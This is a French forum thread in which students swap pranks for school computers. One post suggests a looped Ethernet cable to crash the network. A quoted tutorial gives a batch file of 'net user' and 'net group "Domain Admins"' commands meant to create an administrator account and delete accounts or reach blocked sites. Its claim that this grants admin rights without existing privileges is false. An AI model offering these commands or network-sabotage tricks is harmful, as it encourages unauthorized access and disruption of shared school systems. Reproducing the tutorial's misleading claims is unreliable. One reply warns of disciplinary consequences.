astuce pour tout les petit encore au collège ou lycée

Statut
N'est pas ouverte pour d'autres réponses.

Gueckoz SEC

Assistant
Inscription
27 Janvier 2012
Messages
8 117
Réactions
2 948
Points
29 370
Tous les comptes du lycée ? Y comprit ceux des profs ? Si tu y arrives, je t'appelle Dieu :trollface:.

PS : Sinon faudrait que j'essaye, imaginez accéder à un compte du prof que tu as en cours, tu mets tout le monde absent sauf toi :rofl:, ça serait trop marrant de voir les potes de ta classe ragé.
 

Kerir

Premium
Inscription
2 Juillet 2012
Messages
3 564
Réactions
1 089
Points
16 356
De toute facon tu risque gros !
 

Volkhy

Membre
Inscription
3 Juin 2012
Messages
476
Réactions
110
Points
9 373
è_é M'en bats les couilles ils me trouveront pas je vais utiliser un profil d'un pote :trollface:
 

xXpp3Xx

Membre
Inscription
8 Décembre 2012
Messages
143
Réactions
31
Points
193
il y a aussi un truck sympas si vous avez un grand lycée ou collège et tout con au qu'elle on n'e pence pas branchez un cable Ethernet en boucle

sa fait : prise Ethernet
cable
prise Ethernet
c'est assez marrent le serveur va planter et temps que l'erreur n'a pas été corriger les serveur va planter planter planter .....
et oui j'été un élève très dur
 

VeerDosE

On PS4 #
Premium
Inscription
17 Décembre 2012
Messages
2 992
Réactions
1 261
Points
5 216
Merci je connaissait pas du tout =)
 

#Eddie

Anciennement appelé Challenges-Lobby
Premium
Inscription
31 Octobre 2012
Messages
8 510
Réactions
3 310
Points
10 108
Je vais vous apprendre comment vous amusez un peu au collège ou au lycée ou n'importe ou ou vous avez un ordinateur. (Endroit public de preference)

COMMENCEMENT DU TOTORIEL

Se mettre administrateur a partir d'un bloc note. (ne pas faire depuis un cybercafé)

Ouvrez un bloc note sur l'ordinateur.
Tapez :
echo off
net user nomdutilisateur motdepasse /add
net localgroup Administrator nomduilistateur /add
net group "Domain Admins" nomdutilisateur /add
pause


vous enregistrer et vous le nommé "start.bat" biensur en enregistrent SOUS ! et vous faite "tout les fichier"

Démarrer le, vous avez désormais un compte admin vous pouvez supprimer les dossier, regarder le firewall (action d'autres personnes) accèdé a des sites interdit, ou au dossier personnelle. Vous pouvez supprimer des comptes etc...

Maintenant derniere petite astuce comment accèder a un site interdit au collège/lycée quand il est bloquer ?

Simple ouvrez un bloc note, taper :

echo off
ping
pause

Bien de recopié une vidéo ! :trollface:

Je déconne, mais une vidéo dit la même chose et plein de mec la font tournée sur FB en ce moment ! *_*

Tentative d'intrusion / modification / piratage du réseaux = Conseil de discipline, un pote en à fait les frais ! :/
 

xXpp3Xx

Membre
Inscription
8 Décembre 2012
Messages
143
Réactions
31
Points
193
Bien de recopié une vidéo ! :trollface:

Je déconne, mais une vidéo dit la même chose et plein de mec la font tournée sur FB en ce moment ! *_*

Tentative d'intrusion / modification / piratage du réseaux = Conseil de discipline, un pote en à fait les frais ! :/
perso je ne voi pas de quel vidéos tu parle j'ai rien recopier du tout juste un vieux tuto que jai retrouvez sur mon ancien forum de hack
 
Statut
N'est pas ouverte pour d'autres réponses.
Haut